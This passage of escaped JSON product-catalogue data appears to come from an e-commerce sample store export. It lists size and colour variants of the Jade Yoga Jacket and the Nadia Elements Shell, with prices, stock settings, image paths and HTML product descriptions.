Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Jade Yoga Jacket-L-Gray\",\"description\":\"<p><br \\/>If only all your other jackets were as comfortable as the relaxed-fit Jade Yoga Jacket, perfect for use during stretching, biking to and from studio or strolling on breezy fall days.<\\/p>\\n<p>&bull; Seafoam 1\\/4 zip pullover with purple stitching.<br \\/>&bull; Lightweight, quick-drying, water-resistant construction.<br \\/>&bull; Shirred details at front and back for a feminine look.<br \\/>&bull; Hood collapses into collar.<br \\/>&bull; Mesh liner for breathability.<br \\/>&bull; Front zip pockets.<br \\/>&bull; Hem cinches at sideseam.<br \\/>&bull; 100% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jade-yoga-jacket-l-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Gray\"},\"1281\":{\"sku\":\"WJ09-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Jade Yoga Jacket-L-Green\",\"description\":\"<p><br \\/>If only all your other jackets were as comfortable as the relaxed-fit Jade Yoga Jacket, perfect for use during stretching, biking to and from studio or strolling on breezy fall days.<\\/p>\\n<p>&bull; Seafoam 1\\/4 zip pullover with purple stitching.<br \\/>&bull; Lightweight, quick-drying, water-resistant construction.<br \\/>&bull; Shirred details at front and back for a feminine look.<br \\/>&bull; Hood collapses into collar.<br \\/>&bull; Mesh liner for breathability.<br \\/>&bull; Front zip pockets.<br \\/>&bull; Hem cinches at sideseam.<br \\/>&bull; 100% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jade-yoga-jacket-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj09-green_alt1.jpg,\\/w\\/j\\/wj09-green_back.jpg\",\"image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj09-green_alt1.jpg,\\/w\\/j\\/wj09-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"1282\":{\"sku\":\"WJ09-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Jade Yoga Jacket-XL-Blue\",\"description\":\"<p><br \\/>If only all your other jackets were as comfortable as the relaxed-fit Jade Yoga Jacket, perfect for use during stretching, biking to and from studio or strolling on breezy fall days.<\\/p>\\n<p>&bull; Seafoam 1\\/4 zip pullover with purple stitching.<br \\/>&bull; Lightweight, quick-drying, water-resistant construction.<br \\/>&bull; Shirred details at front and back for a feminine look.<br \\/>&bull; Hood collapses into collar.<br \\/>&bull; Mesh liner for breathability.<br \\/>&bull; Front zip pockets.<br \\/>&bull; Hem cinches at sideseam.<br \\/>&bull; 100% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jade-yoga-jacket-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1283\":{\"sku\":\"WJ09-XL-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Jade Yoga Jacket-XL-Gray\",\"description\":\"<p><br \\/>If only all your other jackets were as comfortable as the relaxed-fit Jade Yoga Jacket, perfect for use during stretching, biking to and from studio or strolling on breezy fall days.<\\/p>\\n<p>&bull; Seafoam 1\\/4 zip pullover with purple stitching.<br \\/>&bull; Lightweight, quick-drying, water-resistant construction.<br \\/>&bull; Shirred details at front and back for a feminine look.<br \\/>&bull; Hood collapses into collar.<br \\/>&bull; Mesh liner for breathability.<br \\/>&bull; Front zip pockets.<br \\/>&bull; Hem cinches at sideseam.<br \\/>&bull; 100% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jade-yoga-jacket-xl-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj09-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Gray\"},\"1284\":{\"sku\":\"WJ09-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Jade Yoga Jacket-XL-Green\",\"description\":\"<p><br \\/>If only all your other jackets were as comfortable as the relaxed-fit Jade Yoga Jacket, perfect for use during stretching, biking to and from studio or strolling on breezy fall days.<\\/p>\\n<p>&bull; Seafoam 1\\/4 zip pullover with purple stitching.<br \\/>&bull; Lightweight, quick-drying, water-resistant construction.<br \\/>&bull; Shirred details at front and back for a feminine look.<br \\/>&bull; Hood collapses into collar.<br \\/>&bull; Mesh liner for breathability.<br \\/>&bull; Front zip pockets.<br \\/>&bull; Hem cinches at sideseam.<br \\/>&bull; 100% Polyester.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jade-yoga-jacket-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj09-green_alt1.jpg,\\/w\\/j\\/wj09-green_back.jpg\",\"image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj09-green_alt1.jpg,\\/w\\/j\\/wj09-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"1285\":{\"sku\":\"WJ09\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Jade Yoga Jacket\",\"description\":\"<p><br \\/>If only all your other jackets were as comfortable as the relaxed-fit Jade Yoga Jacket, perfect for use during stretching, biking to and from studio or strolling on breezy fall days.<\\/p>\\n<p>&bull; Seafoam 1\\/4 zip pullover with purple stitching.<br \\/>&bull; Lightweight, quick-drying, water-resistant construction.<br \\/>&bull; Shirred details at front and back for a feminine look.<br \\/>&bull; Hood collapses into collar.<br \\/>&bull; Mesh liner for breathability.<br \\/>&bull; Front zip pockets.<br \\/>&bull; Hem cinches at sideseam.<br \\/>&bull; 100% Polyester.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Jacket|Lightweight|Hooded|Soft Shell|&frac14; zip,material=Polyester,pattern=Solid,climate=Cool|Mild|Spring|Windy,eco_collection=Yes,performance_fabric=No,erin_recommends=Yes,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WJ09-XS-Blue,size=XS,color=Blue|sku=WJ09-XS-Gray,size=XS,color=Gray|sku=WJ09-XS-Green,size=XS,color=Green|sku=WJ09-S-Blue,size=S,color=Blue|sku=WJ09-S-Gray,size=S,color=Gray|sku=WJ09-S-Green,size=S,color=Green|sku=WJ09-M-Blue,size=M,color=Blue|sku=WJ09-M-Gray,size=M,color=Gray|sku=WJ09-M-Green,size=M,color=Green|sku=WJ09-L-Blue,size=L,color=Blue|sku=WJ09-L-Gray,size=L,color=Gray|sku=WJ09-L-Green,size=L,color=Green|sku=WJ09-XL-Blue,size=XL,color=Blue|sku=WJ09-XL-Gray,size=XL,color=Gray|sku=WJ09-XL-Green,size=XL,color=Green\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj09-green_alt1.jpg,\\/w\\/j\\/wj09-green_back.jpg\",\"image\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj09-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj09-green_alt1.jpg,\\/w\\/j\\/wj09-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Jacket|Lightweight|Hooded|Soft Shell|&frac14; zip\",\"material\":\"Polyester\",\"pattern\":\"Solid\",\"climate\":\"Cool|Mild|Spring|Windy\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"No\",\"erin_recommends\":\"Yes\",\"new\":\"No\",\"sale\":\"No\"},\"1286\":{\"sku\":\"WJ10-XS-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nadia Elements Shell-XS-Black\",\"description\":\"<p>Protect yourself from wind and rain in the stylish Nadia Elements Shell. It repels water using hydro-resistant fabric, with fleece lining that adds a touch of warmth. It\'s finished with bold contrast zippers, adjustable cuffs and a hood.<\\/p>\\n<p>&bull; Zippered front. <br \\/>&bull; Zippered side pockets. <br \\/>&bull; Drawstring-adjustable waist and hood. <br \\/>&bull; Machine wash\\/line dry.<br \\/>&bull; Light blue 1\\/4 zip pullover.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nadia-elements-shell-xs-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Black\"},\"1287\":{\"sku\":\"WJ10-XS-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nadia Elements Shell-XS-Orange\",\"description\":\"<p>Protect yourself from wind and rain in the stylish Nadia Elements Shell. It repels water using hydro-resistant fabric, with fleece lining that adds a touch of warmth. It\'s finished with bold contrast zippers, adjustable cuffs and a hood.<\\/p>\\n<p>&bull; Zippered front. <br \\/>&bull; Zippered side pockets. <br \\/>&bull; Drawstring-adjustable waist and hood. <br \\/>&bull; Machine wash\\/line dry.<br \\/>&bull; Light blue 1\\/4 zip pullover.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nadia-elements-shell-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"1288\":{\"sku\":\"WJ10-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nadia Elements Shell-XS-Yellow\",\"description\":\"<p>Protect yourself from wind and rain in the stylish Nadia 